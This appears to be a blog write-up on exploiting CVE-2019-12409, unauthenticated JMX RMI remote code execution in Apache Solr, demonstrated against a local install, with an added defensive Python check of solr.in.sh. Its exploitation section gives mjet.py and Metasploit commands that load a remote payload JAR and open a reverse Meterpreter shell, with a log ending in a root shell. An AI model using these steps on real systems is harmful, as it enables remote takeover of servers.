
Attacking JMX RMI

Using Apache Solr remote code execution (CVE-2019-12409) as the example.

Installation

I downloaded version 8.1.1 and found that the default in solr.in.cmd is false, while only in solr.in.sh is the default true, so it can only be triggered on Linux.

Run ./solr start in the bin directory to start Solr.

You can see that port 18983 is open by default.
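As an added defensive example (not from the original post), a small Python audit of a solr.in.sh fragment that reports whether the remote JMX default discussed above is switched on and which RMI port it would expose. It assumes the setting in question is ENABLE_REMOTE_JMX_OPTS, that RMI_PORT defaults to SOLR_PORT + 10000 when unset (which is why a stock install listens on 18983), and uses constructed config fragments.

```python
import re

# Constructed fragment mimicking the vulnerable default solr.in.sh
# (assumption: ENABLE_REMOTE_JMX_OPTS, RMI_PORT and SOLR_PORT are the real variables).
VULNERABLE_SOLR_IN_SH = """\
# Enable remote JMX access by uncommenting the line below.
ENABLE_REMOTE_JMX_OPTS="true"
# The script will use SOLR_PORT+10000 for the RMI_PORT or you can set it here
#RMI_PORT=18983
"""

# The same fragment with the mitigation applied: remote JMX disabled.
HARDENED_SOLR_IN_SH = """\
ENABLE_REMOTE_JMX_OPTS="false"
#RMI_PORT=18983
"""

# Matches lines such as  NAME=value  or  export NAME="value"
ASSIGN_RE = re.compile(r'^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$')


def parse_assignments(text):
    """Collect simple shell variable assignments, skipping blank and commented lines."""
    values = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        match = ASSIGN_RE.match(line)
        if match:
            name, raw = match.groups()
            # drop a trailing comment and surrounding quotes (good enough for solr.in.sh)
            values[name] = raw.split('#', 1)[0].strip().strip('"').strip("'")
    return values


def exposed_jmx_port(config_text, default_solr_port=8983):
    """Return the RMI port solr.in.sh would expose, or None when remote JMX is off."""
    values = parse_assignments(config_text)
    if values.get('ENABLE_REMOTE_JMX_OPTS', 'false').lower() != 'true':
        return None
    solr_port = int(values.get('SOLR_PORT', default_solr_port))
    return int(values['RMI_PORT']) if 'RMI_PORT' in values else solr_port + 10000


def audit(config_text):
    """One-line finding a configuration-compliance job could log."""
    port = exposed_jmx_port(config_text)
    if port is None:
        return "OK: remote JMX disabled"
    return f"FINDING: remote JMX enabled on port {port}; set ENABLE_REMOTE_JMX_OPTS=\"false\""


if __name__ == "__main__":
    print(audit(VULNERABLE_SOLR_IN_SH))
    print(audit(HARDENED_SOLR_IN_SH))
```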

Probing

Scan the port

nmap  -sV -p 18983 127.0.0.1


If it is unauthenticated, you can connect directly:

jconsole  127.0.0.1:18983


Strangely, when I used msf to check whether the vulnerability exists, it was not detected:

use auxiliary/scanner/misc/java_rmi_server


The nmap script did not detect it either:

nmap --script=rmi-vuln-classloader -p 18983 127.0.0.1


Awkward...

Exploitation

mjet

Download the mjet.py script.
Because the JMX service that is enabled does not require authentication by default, it can be used directly:

../jdk1.8/bin/java -jar jython-standalone-2.7.0.jar mjet.py 127.0.0.1 18983 install passwd http://127.0.0.1:8000  8000

../jdk1.8/bin/java -jar jython-standalone-2.7.0.jar mjet.py 127.0.0.1 18983 command passwd "whoami"


msf

Use the exploit/multi/misc/java_jmx_server module:

msf > use java/meterpreter/reverse_tcp
msf payload(java/meterpreter/reverse_tcp) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf payload(java/meterpreter/reverse_tcp) > set LPORT 4444
LPORT => 4444
msf payload(java/meterpreter/reverse_tcp) > use exploit/multi/misc/java_jmx_server
msf exploit(multi/misc/java_jmx_server) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(multi/misc/java_jmx_server) > set RPORT 18983
RPORT => 18983
msf exploit(multi/misc/java_jmx_server) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] 127.0.0.1:18983 - Using URL: http://0.0.0.0:8080/ka4B2HQsM
[*] 127.0.0.1:18983 - Local IP: http://172.16.65.171:8080/ka4B2HQsM
[*] 127.0.0.1:18983 - Sending RMI Header...
[*] 127.0.0.1:18983 - Discovering the JMXRMI endpoint...
[+] 127.0.0.1:18983 - JMXRMI endpoint on 127.0.1.1:18983
[*] 127.0.0.1:18983 - Proceeding with handshake...
[+] 127.0.0.1:18983 - Handshake with JMX MBean server on 127.0.1.1:18983
[*] 127.0.0.1:18983 - Loading payload...
[*] 127.0.0.1:18983 - Replied to request for mlet
[*] 127.0.0.1:18983 - Replied to request for payload JAR
[*] 127.0.0.1:18983 - Executing payload...
[*] 127.0.0.1:18983 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:40740) at 2019-12-06 14:20:04 +0800

meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)


References